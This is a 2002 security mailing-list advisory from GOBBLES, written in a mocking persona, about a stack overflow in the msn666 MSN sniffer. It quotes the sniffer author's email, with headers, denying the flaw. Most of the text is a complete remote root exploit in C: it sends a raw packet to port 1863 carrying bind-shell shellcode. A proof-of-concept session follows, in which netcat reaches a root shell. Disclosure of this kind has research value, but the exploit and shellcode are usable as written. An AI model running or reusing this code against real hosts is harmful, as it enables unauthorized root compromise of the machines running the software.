++++++++ALERT++++++++ALERT++++++++ALERT++++++++ALERT++++++++ ++++STILL BACKDOOR IN MSN666 MSN SNIFFER FOR SNIFFING MSN+++++ ++++++++ALERT++++++++ALERT++++++++ALERT++++++++ALERT++++++++ +EMERGENCY+++ After disclosing malicicious backdoor root hole in msn666 sniffer for sniffing msn yesterday, GOBBLES notice following in he inbox: ... What about the version posted today? http://underground.or.kr/project/msn666/msn666-1.0.1.tar.gz Thanks! - --- Dustin Miller, President SharePoint Experts, a division of FuseWerx LTD http://www.sharepointexperts.com/ http://www.fusewerx.com/ Thank you Mr. President! GOBBLES get right on it hehehe ;PPppPP Then we also see this: Return-Path: X-Sieve: cmu-sieve 2.0 Return-Path: Received: from smtp4.hushmail.com (smtp4.hushmail.com [64.40.111.34]) by imap3.hushmail.com (Postfix) with ESMTP id E780E28184E for ; Fri, 14 Jun 2002 08:08:17 -0700 (PDT) Received: from inhavision.inha.ac.kr (inhavision.inha.ac.kr [165.246.10.162]) by smtp4.hushmail.com (Postfix) with ESMTP id B7A2B3F11; Fri, 14 Jun 2002 08:08:04 -0700 (PDT) Received: from SEONUS (inhavision.inha.ac.kr [165.246.10.162]) by inhavision.inha.ac.kr (8.11.1/8.11.1) with SMTP id g5EFFJ509086; Sat, 15 Jun 2002 00:15:22 +0900 (KST) Message-ID: <001801c213b4$b3563e90$6401a8c0@SEONUS> From: "Seunghyun Seo" To: , Cc: , , , , , References: <200206132342.g5DNgvc54973@mailserver4.hushmail.com> Subject: Re: +ALERT+ BACKDOOR IN MSN666 SNIFFER FOR SNIFFING MSN +ALERT+ Date: Sat, 15 Jun 2002 00:03:46 +0900 Organization: khdp.org, underground.or.kr MIME-Version: 1.0 Content-Type: text/plain; charset="euc-kr" Content-Transfer-Encoding: base64 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2462.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 I'm writer of msn666 msn messege sniffer, there are no problems, and no backdoors in it, if you read the code and procdulre of it detail then you could notice it rightly. Check msn666-1.0.0.tar.gz and msn666-1.0.1.tar.gz at http://underground.or.kr/project/msn666/ again. previous my attaching file needs revision. ... And still see bugs? in code... HRM!?!?! +ALERT+++ Backdoor still present in updated version of msn666 sniffer for sniffing msn. +DETAILS+++ GOBBLES-scan-incoming detect following in incoming backdoor packag- e of updated msn666 sniffer for sniffing msn version 1.0.1: msn666.c: ... void pattern2 ( char *msg, int size ) { char opmsg[16]; ... sscanf ( msg, "%s", &opmsg ); ... It still called like this from runpkt(): ... if ( (int)htons(tcp->dest) == 1863 || ok_flg ) { ... if ( tcp->psh ) { memcpy ( buf, data, sizeof(buf) ); pattern2( buf, htons(ip->tot_len)-40 ); ... GOBBLES think it quite obvious this is still malicicous root backdoor in msn666 sniffer for sniffing msn. +EXPLOIT CODE+++ Now that GOBBLES save he friends of team bugtraq from malicious backdoor root hole in msn666 sniffer for sniffing msn version 1.0.0 and msn666 sniffer for sniffing msn version 1.0.1 it is time to release he exploit code: /* * disclaimer: * * GOBBLES SECURITY LABS (GSL) members working * on version with -m capabilities. Utilizing libnet. * * GOBBLES <3 ROUTE * * This version proves point that even two year * old can write remote exploit. Somehow, this * horribly written code by Alicia's 2 year old * adopted korean nephew works. Remember if you * flame this code, you're mocking a 2 year old * with more skill than you. * * There is nothing special about having the ability * to write remote root xploits. * */ /* * GOBBLES-own-msn666.c (Quack Sang edition) * */ // #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define DADA 0x90 char nappytime[256], treattreat[] = // GOBBLES use Taeho shellcode because he speak turkey, hehehe // Hello friend Taeho Oh! Come pick up shirt at Defcon@!@! "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0" "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06" "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89" "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31" "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80" "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04" "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd" "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80" "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f" "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31" "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff"; int main(int argc, char **argv) { struct sockaddr_in playtime; struct hostent *poopoo; struct iphdr *peepee; struct tcphdr *noodlemmm; int phewwy, banana, yes = 1; char *diaper, *googoo, *store; if(argc != 4) { fprintf(stdout, "%s \n", argv[0]); exit(1); } sscanf(argv[1], "%p", &store); banana = (sizeof(struct iphdr) + sizeof(struct tcphdr) + strlen(treattreat) + sizeof(nappytime) + 24 + 1); diaper = malloc(banana); googoo = (char *) (diaper + sizeof(struct iphdr) + sizeof(struct tcphdr)); peepee = (struct iphdr *) diaper; noodlemmm = (struct tcphdr *) (diaper + sizeof(struct iphdr)); memset(diaper, '\0', banana); memset(googoo, 'x', 16); *(long *)&googoo[16] = (long)store; *(long *)&googoo[20] = (long)store; memset(nappytime, DADA, sizeof(nappytime)); memcpy(googoo+24, nappytime, strlen(nappytime)); memcpy(googoo+24+strlen(nappytime), treattreat, strlen(treattreat)); if((poopoo = gethostbyname(argv[3])) == NULL) { perror(";PPppPPpPp"); exit(1); } if((phewwy = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) { perror(";PPpPPpPP"); exit(1); } if (setsockopt(phewwy, IPPROTO_IP, IP_HDRINCL, (char *)&yes, sizeof(yes)) == -1) { perror(";PPppPPPp"); exit(1); } /* hihihihihi */ peepee->version = 4; peepee->ihl = 5; peepee->tot_len = htons(banana); peepee->id = htons(getpid()); peepee->frag_off = 0; peepee->ttl = 255; peepee->protocol = IPPROTO_TCP; peepee->check = 0; peepee->saddr = inet_addr(argv[2]); /* giggle */ peepee->daddr = inet_addr(inet_ntoa(*((struct in_addr *)poopoo->h_addr))); /* dewty diapey?!? */ noodlemmm->source = htons(9999); noodlemmm->dest = htons(1863); noodlemmm->seq = random(); noodlemmm->doff = 5; noodlemmm->syn = 0; noodlemmm->window = htons(8888); noodlemmm->psh = 1; playtime.sin_family = AF_INET; playtime.sin_port = noodlemmm->dest; playtime.sin_addr = *((struct in_addr *)poopoo->h_addr); memset(&(playtime.sin_zero), '\0', 8); if((sendto(phewwy, diaper, banana, 0, (struct sockaddr *)&playtime, sizeof(struct sockaddr))) == -1) { perror(";PPpPPPppPP"); exit(1); } else { fprintf(stdout, "!@# GOBBLES-own-msn666 (Quack Sang edition) packet sent !@#\n"); exit(0); } } +PROOF OF CONCEPT+++ GOBBLES run msn666 sniffer for sniffing msn version 1.0.1 on he Local Area Network (LAN) once again to prove point: # ./msn666 Then GOBBLES run he Quack Sang version of GOBBLES-own-msn666.c: # ./GOBBLES-own-msn666 0xbfffd6d0 192.168.0.1 192.168.0.2 !@# GOBBLES-own-msn666 (Quack Sang edition) packet sent !@# # nc 192.168.0.2 30464 id uid=0(root) gid=0(root) groups=0(root) +GREETZ+++ Dave Ahmed for sorting our the mess for us. Look for us at defcon, we've got a special tshirt just for you! All our friends who have already emailed us with their thanks for saving them from this sneaky backdoor. Hopefully, now that the Quack Sang exploit is now private, it'll encourage people to stop running the software and to those naughty people who think sniffing is an ethical action (mailsnarf anyone?), will get what they deserve. GOBBLES Security http://www.bugtraq.org http://www.immunitysec.com/GOBBLES/ <- first official mirror, thanks so much Dave!